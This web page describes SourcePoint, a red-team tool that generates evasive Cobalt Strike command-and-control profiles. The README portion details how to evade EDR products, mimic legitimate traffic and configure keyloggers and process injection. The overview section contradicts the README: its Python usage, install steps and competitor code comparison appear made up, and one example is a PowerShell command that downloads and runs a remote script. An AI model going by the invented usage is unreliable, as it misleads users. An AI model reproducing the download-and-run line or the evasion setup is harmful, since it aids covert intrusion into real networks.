SourcePoint
SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.
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Quick Overview
SourcePoint is a tool designed for red team operations, focusing on payload generation and obfuscation. It aims to create sophisticated and evasive payloads that can bypass common detection mechanisms, making it useful for penetration testing and security assessments.
Pros
- Offers a wide range of payload generation options and obfuscation techniques
- Supports multiple programming languages and formats for payload creation
- Includes features for bypassing common antivirus and EDR solutions
- Provides a user-friendly command-line interface for easy operation
Cons
- May be misused by malicious actors for harmful purposes
- Requires responsible usage and proper authorization for ethical testing
- Some generated payloads might still be detected by advanced security solutions
- Limited documentation for advanced usage scenarios
Code Examples
# Generate a basic shellcode payload
sourcepoint.py -p shellcode -l windows/x64/meterpreter/reverse_tcp -e xor -o payload.bin
# Create an obfuscated PowerShell script
sourcepoint.py -p powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')" -e base64 -o obfuscated.ps1
# Generate a Python-based payload with multiple layers of encoding
sourcepoint.py -p python -l windows/meterpreter/reverse_https -e xor,base64,rot13 -o multi_encoded_payload.py
Getting Started
-
Clone the repository:
git clone https://github.com/Tylous/SourcePoint.git
-
Install dependencies:
cd SourcePoint pip install -r requirements.txt
-
Run SourcePoint:
python sourcepoint.py -h
-
Generate a payload:
python sourcepoint.py -p shellcode -l windows/x64/meterpreter/reverse_tcp -e xor -o payload.bin
Remember to use SourcePoint responsibly and only on systems you have explicit permission to test.
Competitor Comparisons
Pros of dnscat2
- More mature project with extensive documentation and community support
- Offers both client and server components for a complete DNS tunneling solution
- Supports encryption and authentication for secure communications
Cons of dnscat2
- Limited to DNS protocol, potentially less flexible for diverse network environments
- May be more easily detected by security tools due to its well-known signature
- Requires more setup and configuration compared to SourcePoint
Code Comparison
SourcePoint (C2 profile generation):
def generate_profile(self):
profile = f"""
set sleeptime "{self.sleep}";
set jitter "{self.jitter}";
set useragent "{self.user_agent}";
"""
return profile
dnscat2 (DNS packet encoding):
def encode_packet(packet)
encoded = [packet.length].pack("n")
encoded << packet
encoded.unpack("H*").first
end
Both projects focus on covert communication, but SourcePoint emphasizes profile generation for various C2 frameworks, while dnscat2 specializes in DNS tunneling. SourcePoint offers more flexibility in terms of supported protocols and C2 frameworks, making it potentially more versatile for different scenarios. However, dnscat2 provides a more complete and established solution specifically for DNS-based covert channels.
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SourcePoint
SourcePoint is a polymorphic C2 profile generator for Cobalt Strike C2s, written in Go. SourcePoint allows unique C2 profiles to be generated on the fly that helps reduce our Indicators of Compromise ("IoCs") and allows the operator to spin up complex profiles with minimal effort. This was done by extensively reviewing Articles as well as Patch Notes to identify key functions and modifiable features. SourcePoint was designed with the intent of addressing the issue of how to make our C2 activity harder to detect, focusing on moving away from malicious IoCs to suspicious ones. The goal here is that it is harder to detect our C2 if our IoCs are not malicious in-nature and require additional research to discover the suspicious nature. SourcePoint contains numerous different configurable options to choose from to modify your profile (in most cases if left blank SourcePoint will randomly choose them for you). The generated profiles modify all aspects of your C2. The goal of this project is to not only aid in circumventing detection-based controls but also help blend C2 traffic and activity into the environment, making said activity hard to detect.
go install github.com/Tylous/SourcePoint
Installation
$go get gopkg.in/yaml.v2
$go build SourcePoint.go
Usage
#./SourcePoint -h
_____ ____ _ __
/ ___/____ __ _______________ / __ \____ (_)___ / /_
\__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
___/ / /_/ / /_/ / / / /__/ __/ ____/ /_/ / / / / / /_
/____/\____/\__,_/_/ \___/\___/_/ \____/_/_/ /_/\__/
(@Tyl0us)
Usage of ./SourcePoint:
-Allocation string
Minimum amount of memory to request for injected content (must be higher than 4096)
-CDN string
CDN cookie name (typically used for AzureEdge profiles)
-CDN-Value string
CDN cookie value (typically used for AzureEdge profiles)
-Customuri string
The base URI for custom HTTP GET/POST profile - Cannot be used with CustomuriGET or CustomuriPOST
-CustomuriGET string
The base URI for custom HTTP GET profile - Must be used with CustomuriPOST
-CustomuriPOST string
The base URI for custom HTTP POST profile - Must be used with CustomuriGET
-Datajitter string
Appends a value to HTTP-Get and HTTP-Post server output (default "50")
-Forwarder
Enabled the X-forwarded-For header (Good for when your C2 is behind a redirector)
-Host string
Team server domain name
-Httplib string
Select the default HTTP Beacon library:
[*] wininet
[*] winhttp' (default "winhttp")
-Injector string
Select the preferred method to allocate memory in the remote process:
[*] VirtualAllocEx (Great for cross architecture i.e x86 -> x64 and x64->x86)
[*] NtMapViewOfSection (A more stealthly option, however fails over to VirtualAllocEx, generating more events when it does)
-Jitter string
Jitter percentage for beacon call home
-Keylogger string
Select the preferred method the beacon will use to log keystrokes:
[*] GetAsyncKeyState (Uses GetAsyncKeyState API (Separate DLL for x86/x64 process))
[*] SetWindowsHookEx (Uses SetWindowsHookEx API)
-Keystore string
SSL keystore name
-Metadata string
Specifies how to transform and embed metadata into the HTTP request:
[*] base64
[*] base64url
[*] netbios
[*] netbiosu (default "base64url")
-Outfile string
Name of output file
-PE_Clone string
PE file beacon will mimic (Use the number):
[1] ActivationManager.dll
[2] audioeng.dll
[3] AzureSettingSyncProvider.dll
[4] BingMaps.dll
[5] DIAGCPL.dll
[6] EDGEHTML.dll
[7] FILEMGMT.dll
[8] FIREWALLCONTROLPANEL.dll
[9] GPSVC.dll
[10] gpupvdev.dll
[11] libcrypto.dll
[12] srvcli.dll
[13] srvsvc.dll
[14] Windows.Storage.Search.dll
[15] Windows.System.Diagnostics.dll
[16] Windows.System.Launcher.dll
[17] Windows.System.SystemManagement.dll
[18] Windows.UI.BioFeedback.dll
[19] Windows.UI.BlockedShutdown.dll
[20] Windows.UI.Core.TextInput.DLL
[21] winsqlite3.dll
[22] WMNetMgr.DLL
[23] wwanapi.dll
[24] WWANSVC.DLL
[25] wow64win.dll
[26] wow64.dll
[27] ctiuser.dll (Carbon Black's DLL)
[28] InProcessClient.dll (SentinelOne's DLL)
[29] umppc.dll (CrowdStrike's DLL)
[30] CyMemDef64.dll (Cylance's DLL)
-Password string
SSL certificate password
-PostEX_Name string
File Post-Ex activities will spawn and inject into (Use the number):
[1] WerFault.exe
[2] WWAHost.exe
[3] choice.exe
[4] bootcfg.exe
[5] dtdump.exe
[6] expand.exe
[7] fsutil.exe
[8] gpupdate.exe
[9] gpresult.exe
[10] logman.exe
[11] mcbuilder.exe
[12] mtstocom.exe
[13] pcaui.exe
[14] powercfg.exe
[15] svchost.exe
-Profile string
HTTP GET/POST profile (Use the number):
[1] Windowsupdate
[2] Slack
[3] Gotomeeting
[4] Outlook.Live
[5] Safebrowsing [Cloudfront Compatible]
[6] AzureEdge [AzureEdge Compatible]
[7] Field-Keyword [Cloudfront Compatible]
[8] Custom (Used with ProfilePath)
-ProfilePath string
Path of custom HTTP GET/POST profile...
-Sleep string
Initial beacon sleep time
-Stage string
Disable host staging (Default: False) (default "false")
-Syscall string
Defines the ability to use direct/indirect system calls instead of the standard Windows API functions calls:
[*] None
[*] Direct
[*] Indirect (default "None")
-TasksDnsProxyMaxSize string
The maximum size (in bytes) of proxy data to transfer via the DNS communication channel at a check in
-TasksMaxSize string
The maximum size (in bytes) of task(s) and proxy data that can be transferred through a communication channel at a check in
-TasksProxyMaxSize string
The maximum size (in bytes) of proxy data to transfer via the communication channel at a check in
-ThreadSpoof
Sets post-ex DLLs to spawn threads with a spoofed start address. These are generated randomly (default true)
-Uri string
The number URIs a profile for beacons to choose from
-Useragent string
UserAgent string for the beacon to use (Leave blank to randomly select one):
[*] Win10Chrome
[*] Win10Edge
[*] Win10IE
[*] Win10
[*] Win6.3
[*] Linux
[*] Mac
-Yaml string
Path to the Yaml config file
Important
SourcePoint primarily automates the build process of a profile. Itâs very important to know all the features modified in these profiles. Knowing these features can really help increase your success.
Options
While there are a lot of settings and features described in the help function of SourcePoint, there are numerous important features baked into each profile that are important to be familiar with. These features are:
Global Options
This part of your profile modifies how the beacon operators. Some of the features used to modify the behaviour are:
- Host Stage - Allows the team server to host staged shellcode for HTTP, HTTPS, DNS. If this is enabled, anyone sending a GET request with a specific value such has
/9ZXq
can pull the shellcode as well - Sleep - The length of time that a beacon calls back home
- Jitter - Appends a percentage to the beacon call home time
- Useragent - The useragent string used when communicating HTTP and HTTPS traffic. Using the appropriate useragent string can help blend into the environment
- Data Jitter - Adds a random-length string to all GET and POST requests to ensure incoming requests are not the same length
- SMB Frame Header - Adds a header value to the SMB beacon messages
- Pipename - Sets the name of the SMB pipe the beacons is going to use for communication
- Pipename Stager - Sets the name of the SMB stager for the beacons
- TCP Frame Header - Adds a header value to the TCP beacon messages
- SSH Banner - The SSH banner used
- SSH Pipename - The name used for the SSH banner
- HttpLib - The library attribute allows the user to specify the default library used by the generated beacons used by the profile. The value can be "wininet" or "winhttp"
Stage
This part of your profile controls how beacon is loaded into memory and edit the content of the beacon DLL. Some of the features used to modify the behaviour are:
- Obfuscate - Obfuscates the import table of the reflective DLL
- Stomppe - Asks the payload to stomp MZ, PE and, e_lfanen values after loading
- Clean up - Tells the beacon to free up memory assoicated with the refelctive DLL that initalized it
- UseRWX - Ensures shellcode does not use Read, Write Execute permissions
- Magic_MZ - Overrides the first bytes (MZ header included) of Beacon's Reflective DLL (currently only for x64)
- Magic_PE - Overrides the PE character marker used by Beacon's Reflective Loader with another value
- Syscall - Defines the ability to use system calls instead of the standard Windows API functions
- Smart Inject - Uses embedded function pointer hints to bootstrap the beacon agent without walking kernel32 EAT
- Sleep Mask - TCP and SMB beacons will obfuscate themselves at rest while they wait for the connection to be established
- PE Header - Changes the characteristics of your beacon Reflective DLL to look like something else in memory
- Transformation - Transform beacon's Reflective DLL stage by removing or adding strings to the .rdata
Process-Inject
This part of your profile controls how the beacon shapes injected content and controls process injection behavior. Some of the features used to modify the behaviour are:
- Allocator - Determines how the beacon's Reflective loader allocates memory
- Minimum Allocation - Minimum amount of memory to request for injected content
- Userwx - Ensures shellcode does not use Read, Write Execute permissions (The alternative is RW)
- Startrwx - Use Read, Write Execute as initial permissions for injected content (The alternative is RW)
- Transformer - Adds a block of padding content injected by the beacon
- Execute - This section determines how to execute the injected code
Post-Exec
This part of your profile controls how the beacon handles post-exploitation modules and commands. Some of the features used to modify the behaviour are:
- Spawnto - Determines the default temporary process beacon will spawn for its post-exploitation command and options
- Obfuscate - Obfuscates the import table of the reflective DLL
- Smart Inject - Pass key function pointers from beacon to its child jobs
- AMSI disable - Disable AMSI for powerpick, execute-assembly, and psinject (Certain EDRs can detect this best avoid using these tools)
- Keylogger - Determines how the keystroker logging API use to capture keystrokes
- Cleanup - Cleanups the post-ex User Defined Reflective DLL ("UDRL") memory when the post-ex DLL is loaded
- Threadhint - Allows post-ex DLLs to spawn threads with a spoofed start address
Profiles
Currently SourcePoint provides you with 7 baked in options for HTTP/HTTPS traffic profiles, based on existing profiles. Of these 6, 4 of them are influenced by and based on:
- Microsoft Window's Update Communication
- Slack's Message Communication
- Gotomeeting's Active Meeting Communication
- Microsoft Outlook's Email Communication
3 of the profile options (5, 6 and 7) are designed specifically for:
- Cloudfront.net
- AzureEdge.net
The last option (8) is designed to input a custom profile. This option is designed to allow an operator to utilize a completely custom traffic profile. There are many cases where a completely unique traffic profile will yield high success rather than one of these. This also allows operators to still utilize SourcePoint's malleability features with their go-to or favorite traffic profile. As this allows for unique profiles itâs important to ensure you tweak and adjust the profile for SourcePoint to work. At a minimum:
- Replace -
header "Host" "acme.com";
withheader "Host" "{{.Variables.Host}}";
- Replace -
/pathtolegitpage/
under the GET field with{{.Variables.HTTP_GET_URI}}
- Replace -
/pathtolegitpage/
under the POST field with{{.Variables.HTTP_POST_URI}}
To do so, use the following options -Customuri
and -ProfilePath
along with -Profile 8
. To use a different URI base for GET and POST, -CustomuriGET
and -CustomuriPOST
should be used in place of -Customuri
. While developing a profile, itâs highly recommended to use the native ./c2lint to verify everything is working.
Sample Example
By combining these options into one profile you can create a highly effective beacon that can circumvent preventive and detective controls. While this remains an evolving cat-and-mouse game, combining the right options against a specific security stack can be quite effective.
Sample Yaml Configs
Stage: "False"
Host: "acme-email.com"
Keystore: "acme-email.com.store"
Password: "Password"
Metadata: "netbios"
Injector: "VirtualAllocEx"
Outfile: "acme.profile"
PE_Clone: 20
Profile: 4
Allocation: 5312
Jitter: 30
Debug: true
Sleep: 35
Uri: 3
Useragent: "Mac"
Post-EX Processname: 11
Datajitter: 40
Keylogger: "SetWindowsHookEx"
Customuri:
CDN:
CDN_Value:
ProfilePath:
Syscall_method:
Httplib:
ThreadSpoof: true
Customuri:
CustomuriGET:
CustomuriPOST:
Forwarder: False
TasksMaxSize:
TasksProxyMaxSize:
TasksDnsProxyMaxSize:
SSL Certificate
Profiles mode 1-4 can be used without a validate SSL, SourcePoint will generate a self-signed certificate related to the profile type. However, valid SSL certificates are extremely important the success of any type of C2. For many reasons but obviously no certificate means the traffic is going to be unencrypted (i.e. HTTP WHICH SHOULD NEVER BE USED) but using a self-signed cert comes with its obvious limitations. There are many ways to obtain a valid SSL certificate to make a keystore my go to way is using a modified version of HTTPsC2DoneRight.sh, created by Cham423.
DNS
Currently DNS customization not offered directly through SourcePoint. To still allow dns-based beacons there is a commented out section for dns-beacon in every generated profile.
To Do List
- Add More Profiles
- DNS Staging
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